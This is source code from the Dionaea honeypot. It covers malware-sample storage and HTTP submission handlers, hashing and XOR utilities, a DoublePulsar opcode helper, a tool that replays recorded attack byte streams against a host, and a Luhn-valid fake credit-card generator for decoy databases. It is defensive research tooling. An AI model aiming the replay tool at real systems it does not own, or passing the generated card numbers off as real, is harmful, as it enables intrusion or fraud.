% (self.__class__.__name__)) 41 | ihandler.__init__(self, path) 42 | def handle_incident(self, icd): 43 | logger.debug("storing file") 44 | p = icd.path 45 | md5 = md5file(p) 46 | n = g_dionaea.config()['downloads']['dir'] + '/' + md5 47 | i = incident("dionaea.download.complete.hash") 48 | i.file = n 49 | i.url = icd.url 50 | if hasattr(icd, 'con'): 51 | i.con = icd.con 52 | i.md5hash = md5 53 | i.report() 54 | 55 | try: 56 | f = os.stat(n) 57 | i = incident("dionaea.download.complete.again") 58 | logger.debug("file %s already existed" % md5) 59 | except OSError: 60 | logger.debug("saving new file %s to %s" % (md5, n)) 61 | os.link(p, n) 62 | i = incident("dionaea.download.complete.unique") 63 | i.file = n 64 | if hasattr(icd, 'con'): 65 | i.con = icd.con 66 | i.url = icd.url 67 | i.md5hash = md5 68 | i.report() 69 | 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /modules/python/scripts/submit_http.py: -------------------------------------------------------------------------------- 1 | from dionaea.core import ihandler, incident, g_dionaea 2 | from dionaea.util import md5file, sha512file 3 | from dionaea import pyev 4 | 5 | import logging 6 | import json 7 | import uuid 8 | import struct 9 | import socket 10 | from urllib.parse import urlparse 11 | 12 | try: 13 | import magic 14 | except: 15 | def filetype(fpath): 16 | return '' 17 | else: 18 | def filetype(fpath): 19 | try: 20 | mc = magic.Magic() 21 | ftype = mc.from_file(fpath) 22 | except: 23 | ftype = '' 24 | return ftype 25 | 26 | logger = logging.getLogger('submit_http') 27 | logger.setLevel(logging.DEBUG) 28 | 29 | class submithttp_report: 30 | def __init__(self, sha512h, md5, filepath): 31 | self.sha512h, self.md5h, self.filepath = sha512h, md5, filepath 32 | self.saddr, self.sport, self.daddr, self.dport = ('', )*4 33 | self.download_url = '' 34 | self.filetype = '' 35 | self.filename = '' 36 | 37 | 38 | class handler(ihandler): 39 | def 
__init__(self, path): 40 | logger.debug("%s ready!" % (self.__class__.__name__)) 41 | ihandler.__init__(self, path) 42 | mwsconfig = g_dionaea.config()['modules']['python']['submit_http'] 43 | self.backendurl = mwsconfig['url'] 44 | self.email = 'email' in mwsconfig and mwsconfig['email'] or 'dionaea@carnivore.it' 45 | self.user = 'user' in mwsconfig and mwsconfig['user'] or '' 46 | self.passwd = 'pass' in mwsconfig and mwsconfig['pass'] or '' 47 | self.cookies = {} 48 | 49 | # heartbeats 50 | dinfo = g_dionaea.version() 51 | self.software = 'dionaea {0} {1}/{2} - {3} {4}'.format( 52 | dinfo['dionaea']['version'], 53 | dinfo['compiler']['os'], 54 | dinfo['compiler']['arch'], 55 | dinfo['compiler']['date'], 56 | dinfo['compiler']['time'], 57 | ) 58 | self.loop = pyev.default_loop() 59 | 60 | def handle_incident(self, icd): 61 | pass 62 | 63 | def handle_incident_dionaea_download_complete_unique(self, icd): 64 | cookie = str(uuid.uuid4()) 65 | 66 | i = incident("dionaea.upload.request") 67 | i._url = self.backendurl 68 | 69 | i.sha512 = sha512file(icd.file) 70 | i.md5 = md5file(icd.file) 71 | i.email = self.email 72 | i.user = self.user 73 | i.set('pass', self.passwd) 74 | 75 | mr = submithttp_report(i.sha512, i.md5, icd.file) 76 | 77 | if hasattr(icd, 'con'): 78 | i.source_host = str(struct.unpack('!I', socket.inet_aton(icd.con.remote.host))[0]) 79 | i.source_port = str(icd.con.remote.port) 80 | i.target_host = str(struct.unpack('!I', socket.inet_aton(icd.con.local.host))[0]) 81 | i.target_port = str(icd.con.local.port) 82 | mr.saddr, mr.sport, mr.daddr, mr.dport = i.source_host, i.source_port, i.target_host, i.target_port 83 | if hasattr(icd, 'url'): 84 | i.url = icd.url 85 | i.trigger = icd.url 86 | try: 87 | i.filename = urlparse(icd.url).path.split('/')[-1] 88 | mr.filename = i.filename 89 | except: 90 | pass 91 | mr.download_url = icd.url 92 | 93 | i.filetype = filetype(icd.file) 94 | mr.filetype = i.filetype 95 | 96 | i._callback = 
"dionaea.modules.python.submithttp.result" 97 | i._userdata = cookie 98 | 99 | self.cookies[cookie] = mr 100 | i.report() 101 | 102 | # handle agains in the same way 103 | handle_incident_dionaea_download_complete_again = handle_incident_dionaea_download_complete_unique 104 | 105 | def handle_incident_dionaea_modules_python_submithttp_result(self, icd): 106 | fh = open(icd.path, mode="rb") 107 | c = fh.read() 108 | logger.info("submithttp result: {0}".format(c)) 109 | 110 | cookie = icd._userdata 111 | mr = self.cookies[cookie] 112 | 113 | # does backend want us to upload? 114 | if b'UNKNOWN' in c or b'S_FILEREQUEST' in c: 115 | i = incident("dionaea.upload.request") 116 | i._url = self.backendurl 117 | 118 | i.sha512 = mr.sha512h 119 | i.md5 = mr.md5h 120 | i.email = self.email 121 | i.user = self.user 122 | i.set('pass', self.passwd) 123 | 124 | i.set('file://data', mr.filepath) 125 | 126 | i.source_host = mr.saddr 127 | i.source_port = mr.sport 128 | i.target_host = mr.daddr 129 | i.target_port = mr.dport 130 | i.url = mr.download_url 131 | i.trigger = mr.download_url 132 | 133 | i.filetype = mr.filetype 134 | i.filename = mr.filename 135 | 136 | i._callback = "dionaea.modules.python.submithttp.uploadresult" 137 | i._userdata = cookie 138 | 139 | i.report() 140 | else: 141 | del self.cookies[cookie] 142 | 143 | def handle_incident_dionaea_modules_python_submithttp_uploadresult(self, icd): 144 | fh = open(icd.path, mode="rb") 145 | c = fh.read() 146 | logger.info("submithttp uploadresult: {0}".format(c)) 147 | 148 | del self.cookies[icd._userdata] 149 | 150 | 151 | -------------------------------------------------------------------------------- /modules/python/scripts/test.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | #* 9 
| #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | 28 | from dionaea.core import ihandler, incident, g_dionaea 29 | from dionaea.core import connection 30 | import logging 31 | import json 32 | global p 33 | 34 | logger = logging.getLogger('test') 35 | logger.setLevel(logging.DEBUG) 36 | 37 | 38 | class uniquedownloadihandler(ihandler): 39 | def __init__(self, path): 40 | logger.debug("%s ready!" 
% (self.__class__.__name__)) 41 | ihandler.__init__(self, path) 42 | def handle_incident(self, icd): 43 | logger.debug("submitting file") 44 | try: 45 | tos = g_dionaea.config()['submit'] 46 | except: 47 | return 48 | 49 | for to in tos: 50 | if 'urls' not in tos[to]: 51 | logger.warn("your configuration lacks urls to submit to %s" % to) 52 | continue 53 | for url in tos[to]['urls']: 54 | i = incident("dionaea.upload.request") 55 | i._url = url 56 | # copy all values for this url 57 | for key in tos[to]: 58 | if key == 'urls': 59 | continue 60 | if key == 'file_fieldname': 61 | i.set("file://" + tos[to][key], icd.file) 62 | continue 63 | i.set(key, tos[to][key]) 64 | i.report() 65 | -------------------------------------------------------------------------------- /modules/python/scripts/upnp/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/upnp/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/util.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2010 Mark Schloesser 8 | #* Copyright (C) 2009 Paul Baecher & Markus Koetter 9 | #* 10 | #* This program is free software; you can redistribute it and/or 11 | #* modify it under the terms of the GNU General Public License 12 | #* as published by the Free Software Foundation; either version 2 13 | #* of the License, or (at your option) any later version. 14 | #* 15 | #* This program is distributed in the hope that it will be useful, 16 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 17 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
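#* GNU General Public License for more details.
#*
#* You should have received a copy of the GNU General Public License
#* along with this program; if not, write to the Free Software
#* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#*
#*
#* contact nepenthesdev@gmail.com
#*
#*******************************************************************************/


import sys
import hashlib


def md5file(filename):
    """Hex MD5 digest of the file at ``filename`` (see hashfile)."""
    return hashfile(filename, hashlib.md5())


def sha512file(filename):
    """Hex SHA-512 digest of the file at ``filename`` (see hashfile)."""
    return hashfile(filename, hashlib.sha512())


def hashfile(filename, digest):
    """
    Feed the contents of ``filename`` through ``digest`` in 4 KiB chunks.

    :param filename: path of the file to hash
    :param digest: a hashlib object (anything with update() and hexdigest())
    :return: the hex digest as a str
    :raises OSError: if the file cannot be opened or read
    """
    # ``with`` closes the handle even when read() raises; the original only
    # closed it on the success path, leaking the descriptor on errors.
    with open(filename, mode="rb") as fh:
        for buf in iter(lambda: fh.read(4096), b""):
            digest.update(buf)
    return digest.hexdigest()


def xor(data, key):
    """
    XOR ``data`` with ``key`` repeated cyclically.

    :param data: bytes-like input
    :param key: non-empty bytes-like key
    :return: bytearray of len(data)
    :raises ValueError: if ``key`` is empty (was an opaque ZeroDivisionError)
    """
    klen = len(key)
    if klen == 0:
        raise ValueError("xor: key must not be empty")
    return bytearray(b ^ key[i % klen] for i, b in enumerate(data))


def calculate_doublepulsar_opcode(t):
    """
    Return t + (t >> 8) + (t >> 16) + (t >> 24).

    Named after the DoublePulsar SMB implant's opcode derivation; how the
    result is masked or compared is up to the caller in the SMB module
    (not visible here), so no range is guaranteed for the return value.
    """
    return t + (t >> 8) + (t >> 16) + (t >> 24)


# ---------------------------------------------------------------------------
# /modules/python/setup.py.in
# ---------------------------------------------------------------------------
#********************************************************************************
#* Dionaea
#* - catches bugs -
#*
#*
#*
#* Copyright (C) 2009 Paul Baecher & Markus Koetter
#*
#* This program is free software; you can redistribute it and/or
#* modify it under the terms of the GNU General Public License
#* as published by the Free Software Foundation; either version 2
#* of the License, or (at your option) any later version.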
13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | 28 | from distutils.core import setup 29 | from distutils.extension import Extension 30 | from Cython.Distutils import build_ext 31 | 32 | from distutils import sysconfig 33 | 34 | # The SlackWare Diaries ... 35 | # we do not want python2.x to add its -lpython2.x to the linker 36 | # even if Py_ENABLE_SHARED is 1 37 | # therefore we have to adjust the global Py_ENABLE_SHARED value in the 38 | # distutils.sysconfig._config_vars dict 39 | # the proper fix would be not using py2 to build the module but py3 instead 40 | # thanks to pyllyukko for his incredible patience with me working this out 41 | #if sysconfig.get_config_var('Py_ENABLE_SHARED') == 1: 42 | # sysconfig._config_vars['Py_ENABLE_SHARED'] = 0 43 | 44 | 45 | cflags='' 46 | cflags+='@LIB_GLIB_CFLAGS@' # glib 47 | cflags+=' ' 48 | cflags+='@LIB_EV_CFLAGS@ -fno-strict-aliasing' # libev 49 | cflags+=' ' 50 | cflags+='@LIB_LCFG_CFLAGS@' #liblcfg 51 | cflags+=' ' 52 | cflags+='@PYTHON_CSPEC@' # python 53 | cflags+=' ' 54 | cflags+='@CFLAGS_DEFAULT@' 55 | cflags+=' ' 56 | cflags+='@CFLAGS_DEBUG@' 57 | 58 | libs='' 59 | libs+='@PYTHON_LSPEC@' # python 60 | 61 | 62 | 63 | include_dir_dict = {} 64 | extra_compile_dict = {} 65 | for i in cflags.split(): 66 | if i.startswith('-I'): 67 | include_dir_dict[i[2:]] = 1 68 | else: 69 | extra_compile_dict[i] = 1 70 | 71 | 
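library_dict = {}
library_dir_dict = {}
library_other_dict = {}

# Bucket each token of the pkg-config style `libs` string: -l<name> becomes a
# library, -L<dir> a library directory, anything else is passed straight to the
# linker. Dicts are used as insertion sets; only their sorted keys are consumed.
for token in libs.split():
    if token.startswith('-l'):
        library_dict[token[2:]] = 1
    elif token.startswith('-L'):
        library_dir_dict[token[2:]] = 1
    else:
        library_other_dict[token] = 1

ext_modules = [
    Extension("dionaea.core",
              ['binding.pyx', 'module.c', 'pyev/pyev.c'],
              language="c",
              include_dirs=['../../include', '../../'] + sorted(include_dir_dict),
              extra_compile_args=sorted(extra_compile_dict),
              libraries=sorted(library_dict),
              library_dirs=sorted(library_dir_dict),
              extra_link_args=sorted(library_other_dict),
              undef_macros=['NDEBUG'],
              define_macros=[('_GNU_SOURCE', None)]
              ),
]

setup(
    name='dionaea',
    cmdclass={'build_ext': build_ext},
    ext_modules=ext_modules,
)

--------------------------------------------------------------------------------
/modules/python/util/Makefile.am:
--------------------------------------------------------------------------------
AUTOMAKE_OPTIONS = foreign

bin_SCRIPTS = readlogsqltree gnuplotsql
CLEANFILES = $(bin_SCRIPTS)
EXTRA_DIST = readlogsqltree.py gnuplotsql.py


do_subst = sed -e 's,[@]PYTHON[@],$(PYTHON),g'

readlogsqltree: readlogsqltree.py
	$(do_subst) < readlogsqltree.py > readlogsqltree
	chmod +x readlogsqltree

gnuplotsql: gnuplotsql.py
	$(do_subst) < gnuplotsql.py > gnuplotsql
	chmod +x gnuplotsql

install-exec-hook:
	-rm -f $(bin_SCRIPTS)
--------------------------------------------------------------------------------
/modules/python/util/csv2sqlite.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#
# create a sqlite database from a csv file
# creates table schema and inserts rows
# can handle multiple csv files
#
# ./csv2sqlite a.csv bs.csv
# will create tables a and bs and bs will get the primary key of type integer "b"
#

import sqlite3
import csv
import sys
import argparse
import codecs
import os
import re

# Table and column names are spliced into the SQL text as identifiers; they
# cannot be bound as parameters. A CSV header (or a file name) is untrusted
# input, so restrict identifiers to a conservative charset and double-quote
# them instead of formatting them straight into CREATE/INSERT/CREATE INDEX.
IDENTIFIER_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_]*$')


def quote_identifier(name):
    """Validate `name` as a plain SQL identifier and return it double-quoted.

    Raises ValueError for anything outside [A-Za-z_][A-Za-z0-9_]*.
    """
    if not IDENTIFIER_RE.match(name):
        raise ValueError("invalid SQL identifier %r" % (name,))
    return '"%s"' % name


if __name__ == '__main__':

    parser = argparse.ArgumentParser(description='Create a sqlite database from one or more csv files')
    parser.add_argument('--database', help='the database to create', required=True)
    parser.add_argument('--primary-key', help='create a primary key')
    parser.add_argument('files', nargs='*', help='csv files to use as input')
    args = parser.parse_args()

    primary_key = None
    if args.primary_key is not None:
        try:
            primary_key = quote_identifier(args.primary_key)
        except ValueError as e:
            sys.exit("--primary-key: %s" % (e,))

    dbh = sqlite3.connect(args.database)
    cursor = dbh.cursor()

    for f in args.files:
        print("Processing File %s" % (f,))
        # table name = file name without directory and extension
        # (the original used f[:-4], which silently assumed a 3-letter suffix)
        table = os.path.splitext(os.path.basename(f))[0]
        try:
            table_q = quote_identifier(table)
        except ValueError as e:
            print("Skipping %s: %s" % (f, e))
            continue

        with codecs.open(f, 'r', encoding="utf-8-sig") as fh:
            c = csv.reader(fh, delimiter=',', quotechar='"')
            try:
                colnames = next(c)      # c.next() is python2-only
            except StopIteration:
                print("Skipping %s: empty file" % (f,))
                continue
            print("Using column names %s" % " ".join(colnames))
            try:
                quoted = [quote_identifier(col) for col in colnames]
            except ValueError as e:
                print("Skipping %s: %s" % (f, e))
                continue
            cols = ','.join(quoted)
            if primary_key is not None:
                cols2 = "%s INTEGER PRIMARY KEY, " % primary_key + cols
            else:
                cols2 = cols
            create_table = "CREATE TABLE %s ( %s )" % (table_q, cols2)
            insert_into = "INSERT INTO %s (%s) VALUES (%s) " % (table_q, cols, ','.join(['?' for i in colnames]))

            try:
                dbh.execute(create_table)
            except Exception as e:
                print("Could not CREATE table %s (%s))" % (table, e))
                continue
            for row in c:
                try:
                    cursor.execute(insert_into, row)
                except Exception as e:
                    print("Could not insert %s into table %s (%s)" % (row, table, e))
                    print(insert_into)
            # The original iterated over the characters of the joined column
            # string and built the CREATE INDEX statements without executing
            # them. Index names are database-global in sqlite, so include the
            # table name to avoid collisions between files sharing a header.
            for col, col_q in zip(colnames, quoted):
                create_idx = "CREATE INDEX %s ON %s (%s)" % (
                    quote_identifier("%s_%s_idx" % (table, col)), table_q, col_q)
                try:
                    dbh.execute(create_idx)
                except Exception as e:
                    print("Could not create index on %s.%s (%s)" % (table, col, e))
            dbh.commit()

    dbh.close()


--------------------------------------------------------------------------------
/modules/python/util/gnuplotsql/gnuplot.example:
--------------------------------------------------------------------------------
set terminal png size 600,600 nocrop butt font "/usr/share/fonts/truetype/ttf-liberation/LiberationSans-Regular.ttf" 8
set output "{filename_output}"
set xdata time
set timefmt "%Y-%m-%d"
set xrange ["{range_start}":"{range_stop}"]
set format x "%b %d"
set xlabel "date"
set ylabel "count"
set y2label "count"
set y2tics
set grid

set size 1.0,0.5

set style line 1 lt rgb "#00C613"
set style line 2 lt rgb "#6AFFA0"
set style line 3 lt rgb "#23FF38"
set style line 4 lt rgb "#75BF0F"
set style line 5 lt rgb "#A1FF00"
set style line 6 lt rgb "red"

unset logscale y
set datafile separator "|"
set multiplot

set origin 0.0,0.5
plot "{filename_data}" using 1:3 title "accept" with lines, \
     "" using 1:4 title "shellcode" with lines, \
     "" using 1:5 title "offers" with lines, \
     "" using 1:6 title "downloads" with lines, \
     "" using 1:7 title "uniq" with lines, \
     "" using 1:8 title "new" with lines

set origin 0.0,0.0
plot "{filename_data}" using 1:2 title "hosts" with lines

unset multiplot
--------------------------------------------------------------------------------
/modules/python/util/gnuplotsql/gnuplot.svg.example: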
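--------------------------------------------------------------------------------
set terminal svg enhanced size 600,600 font "arial,8"
set output "{filename_output}"
set xdata time
set timefmt "%Y-%m-%d"
set xrange ["{range_start}":"{range_stop}"]
set format x "%b %d"
set xlabel "date"
set ylabel "count"
set y2label "count"
set y2tics
set grid

set size 1.0,0.5

set style line 1 lt rgb "#00C613"
set style line 2 lt rgb "#6AFFA0"
set style line 3 lt rgb "#23FF38"
set style line 4 lt rgb "#75BF0F"
set style line 5 lt rgb "#A1FF00"
set style line 6 lt rgb "red"

unset logscale y
set datafile separator "|"
set multiplot

set origin 0.0,0.5
plot "{filename_data}" using 1:3 title "accept" with lines, \
     "" using 1:4 title "shellcode" with lines, \
     "" using 1:5 title "offers" with lines, \
     "" using 1:6 title "downloads" with lines, \
     "" using 1:7 title "uniq" with lines, \
     "" using 1:8 title "new" with lines

set origin 0.0,0.0
plot "{filename_data}" using 1:2 title "hosts" with lines

unset multiplot
--------------------------------------------------------------------------------
/modules/python/util/retry.py:
--------------------------------------------------------------------------------
#!/opt/dionaea/bin/python3.1
#
# Replay a recorded bistream against a host: the stream file is a python
# module defining `stream`, a sequence of ('in'|'out', bytes) entries.
# 'in' entries are sent, 'out' entries are read back (only when -s / -r are
# given); each entry is followed by a one second pause.

from optparse import OptionParser
import importlib
import socket
import os
import shutil
import sys
import time

parser = OptionParser()
parser.add_option("-f", "--file", action="store", type="string", dest="filename")
parser.add_option("-H", "--host", action="store", type="string", dest="host")
parser.add_option("-p", "--port", action="store", type="int", dest="port")
parser.add_option("-s", "--send", action="store_true", dest="send", default=False)
parser.add_option("-r", "--recv", action="store_true", dest="recv", default=False)
parser.add_option("-t", "--tempfile", action="store", type="string", dest="tempfile", default="retrystream")
parser.add_option("-u", "--udp", action="store_true", dest="udp", default=False)
parser.add_option("-v", "--verbose", action="store_true", dest="verbose", default=False)
(options, args) = parser.parse_args()

if options.filename is None:
    parser.error("-f/--file is required")
if (options.send or options.recv) and (options.host is None or options.port is None):
    parser.error("-H/--host and -p/--port are required with -s or -r")

# The stream file is copied next to us and imported as a module. Importing
# executes every statement in it, so a stream file is as trusted as code:
# only replay files you wrote or inspected. (The original exec()'d a built
# "from <tempfile> import stream" string; import_module does the same
# without string evaluation.)
module_path = options.tempfile + ".py"
# the original tested for the name without ".py" and so never removed the
# copy it actually writes
if os.path.exists(module_path):
    os.unlink(module_path)
shutil.copy(options.filename, module_path)

sys.path.append(".")
stream = importlib.import_module(options.tempfile).stream

print("doing " + options.filename)
# A socket is needed for -r as well; the original only created it for -s and
# then failed with NameError on the first 'out' entry when run with -r alone.
s = None
if options.send or options.recv:
    sock_type = socket.SOCK_DGRAM if options.udp else socket.SOCK_STREAM
    s = socket.socket(socket.AF_INET, sock_type)
    s.connect((options.host, options.port))

try:
    for entry in stream:
        direction, payload = entry[0], entry[1]
        if direction == 'in':
            sent = 0
            if options.send:
                sent = s.send(payload)
            if options.verbose:
                print('send %i of %i bytes' % (sent, len(payload)))
        if direction == 'out':
            received = b""
            if options.recv:
                received = s.recv(len(payload))
            if options.verbose:
                print('recv %i of %i bytes' % (len(received), len(payload)))
        time.sleep(1)

    time.sleep(1)
finally:
    if s is not None:
        s.close()
--------------------------------------------------------------------------------
/modules/python/util/updateccs.py:
--------------------------------------------------------------------------------
#!/opt/dionaea/bin/python3
#
#
# Basing on:
# gencc: A simple program to generate credit card numbers that pass the MOD 10 check
# (Luhn formula).
# Useful for testing e-commerce sites during development.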
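#
# Copyright 2003 Graham King
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
#
# http://www.darkcoding.net/credit-card-generator/
#

from random import Random
import sys
import copy
import sqlite3
import argparse

# Issuer prefixes as lists of digit strings. A generated number starts with
# one of them and is padded with random digits up to the requested length.
visaPrefixList = [ ['4', '5', '3', '9'],
                   ['4', '5', '5', '6'],
                   ['4', '9', '1', '6'],
                   ['4', '5', '3', '2'],
                   ['4', '9', '2', '9'],
                   ['4', '0', '2', '4', '0', '0', '7', '1'],
                   ['4', '4', '8', '6'],
                   ['4', '7', '1', '6'],
                   ['4'] ]

mastercardPrefixList = [ ['5', '1'],
                         ['5', '2'],
                         ['5', '3'],
                         ['5', '4'],
                         ['5', '5'] ]

amexPrefixList = [ ['3', '4'],
                   ['3', '7'] ]

discoverPrefixList = [ ['6', '0', '1', '1'] ]

dinersPrefixList = [ ['3', '0', '0'],
                     ['3', '0', '1'],
                     ['3', '0', '2'],
                     ['3', '0', '3'],
                     ['3', '6'],
                     ['3', '8'] ]

enRoutePrefixList = [ ['2', '0', '1', '4'],
                      ['2', '1', '4', '9'] ]

jcbPrefixList16 = [ ['3', '0', '8', '8'],
                    ['3', '0', '9', '6'],
                    ['3', '1', '1', '2'],
                    ['3', '1', '5', '8'],
                    ['3', '3', '3', '7'],
                    ['3', '5', '2', '8'] ]

jcbPrefixList15 = [ ['2', '1', '0', '0'],
                    ['1', '8', '0', '0'] ]

voyagerPrefixList = [ ['8', '6', '9', '9'] ]


def completed_number(prefix, length):
    """Pad `prefix` (a list of digit strings) with random digits to
    `length` - 1 digits, append the Luhn check digit and return the number
    as a string. Typical lengths are 13 or 16.

    The padding digits come from the module-level `generator` (a
    random.Random), which gencc() creates lazily; call gencc() rather than
    this function unless `generator` has been set. `prefix` is not modified.
    """
    ccnumber = list(prefix)

    # generate digits
    digits = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
    while len(ccnumber) < (length - 1):
        ccnumber.append(generator.choice(digits))

    # Luhn sum over the payload digits, walking from the rightmost one:
    # every digit at an even offset is doubled (minus 9 if that exceeds 9),
    # the digit after it is added as is.
    total = 0
    pos = 0
    reversed_digits = list(ccnumber)
    reversed_digits.reverse()

    while pos < length - 1:
        doubled = int(reversed_digits[pos]) * 2
        if doubled > 9:
            doubled -= 9
        total += doubled
        if pos != (length - 2):
            total += int(reversed_digits[pos + 1])
        pos += 2

    # The check digit brings the total to a multiple of 10. Integer division
    # is essential: this script runs under python3, where the original
    # `sum / 10` produced a float and appended e.g. "0.0" instead of a digit,
    # so every generated number failed the Luhn check it was meant to pass.
    checkdigit = ((total // 10 + 1) * 10 - total) % 10
    ccnumber.append(str(checkdigit))
    return ''.join(ccnumber)


def credit_card_number(generator, prefixList, length):
    """Return a Luhn-valid number using a random prefix from `prefixList`.

    `length` is either an int or a list of candidate lengths, one of which
    is picked with `generator`.
    """
    if isinstance(length, list):
        length = generator.choice(length)
    ccnumber = copy.copy(generator.choice(prefixList))
    return completed_number(ccnumber, length)


generator = None


def gencc(card):
    """sqlite user function: a fresh Luhn-valid number for card type `card`
    ("MasterCard", "Visa" or "AmericanExpress"), as a string of digits.

    Raises ValueError for an unknown card type (the original raised the
    undefined name ValueException, i.e. a NameError).

    These are test data only: random.Random is not a CSPRNG and the numbers
    are not tied to any real account.
    """
    global generator
    cards = { "MasterCard": { "prefix" : mastercardPrefixList, "length": 16 },
              "Visa":{ "prefix" : visaPrefixList, "length": [13,16] },
              "AmericanExpress":{ "prefix" : amexPrefixList, "length": 15 },
            }
    if generator is None:
        generator = Random()
        generator.seed()        # Seed from current time

    if card in cards:
        return credit_card_number(generator, cards[card]['prefix'], cards[card]['length'])
    raise ValueError("card %s is unknown" % card)


if __name__ == '__main__':

    parser = argparse.ArgumentParser(description='Update a sqlite Database with random but correct cc numbers')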
parser.add_argument('database', help='the database to use') 137 | parser.add_argument('--table', help='the table to update', required=True) 138 | parser.add_argument('--type-col', help='the column containing the cc type', required=True) 139 | parser.add_argument('--num-col', help='the column containing the cc number', required=True) 140 | args = parser.parse_args() 141 | 142 | dbh = sqlite3.connect(args.database) 143 | dbh.create_function("gencc",1,gencc) 144 | 145 | cursor = dbh.cursor() 146 | query = "UPDATE {:s} SET {:s}=CAST(gencc({:s}) AS INTEGER)".format(args.table,args.num_col,args.type_col) 147 | print(query) 148 | cursor.execute(query) 149 | dbh.commit() 150 | print("updated the ccs for %i rows" % cursor.rowcount) 151 | 152 | -------------------------------------------------------------------------------- /modules/xmatch/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | AM_CFLAGS = -I$(top_srcdir)/include -I$(top_srcdir)/src 6 | AM_CFLAGS += -fno-strict-aliasing 7 | 8 | AM_CFLAGS += $(LIB_XMATCH_CFLAGS) 9 | AM_LDFLAGS = $(LIB_XMATCH_LIBS) 10 | 11 | pkglib_LTLIBRARIES = xmatch.la 12 | 13 | xmatch_la_SOURCES = module.c xmatch.c 14 | 15 | xmatch_la_LDFLAGS = -module -no-undefined -avoid-version ${AM_LDFLAGS} 16 | 17 | -------------------------------------------------------------------------------- /modules/xmatch/module.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 
13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | 29 | #include 30 | #include 31 | 32 | #include "modules.h" 33 | #include "connection.h" 34 | #include "dionaea.h" 35 | 36 | #include "module.h" 37 | #include "processor.h" 38 | 39 | #define D_LOG_DOMAIN "xmatch" 40 | 41 | 42 | static bool xmatch_config(struct lcfgx_tree_node *node) 43 | { 44 | g_debug("%s", __PRETTY_FUNCTION__); 45 | return true; 46 | } 47 | 48 | static bool xmatch_prepare(void) 49 | { 50 | g_debug("%s", __PRETTY_FUNCTION__); 51 | g_hash_table_insert(g_dionaea->processors->names, (void *)proc_xmatch.name, &proc_xmatch); 52 | return true; 53 | } 54 | 55 | static bool xmatch_new(struct dionaea *d) 56 | { 57 | g_debug("%s", __PRETTY_FUNCTION__); 58 | return true; 59 | } 60 | 61 | static bool xmatch_free(void) 62 | { 63 | g_debug("%s", __PRETTY_FUNCTION__); 64 | return true; 65 | } 66 | 67 | static bool xmatch_hup(struct lcfgx_tree_node *node) 68 | { 69 | g_debug("%s", __PRETTY_FUNCTION__); 70 | return true; 71 | } 72 | 73 | struct module_api *module_init(struct dionaea *d) 74 | { 75 | g_debug("%s:%i %s dionaea %p",__FILE__, __LINE__, __PRETTY_FUNCTION__, d); 76 | static struct module_api xmatch_api = 77 | { 78 | .config = &xmatch_config, 79 | .prepare = &xmatch_prepare, 80 | .new = &xmatch_new, 81 | .free = &xmatch_free, 82 | .hup = &xmatch_hup 83 | }; 84 | 85 | return &xmatch_api; 86 | } 87 | 
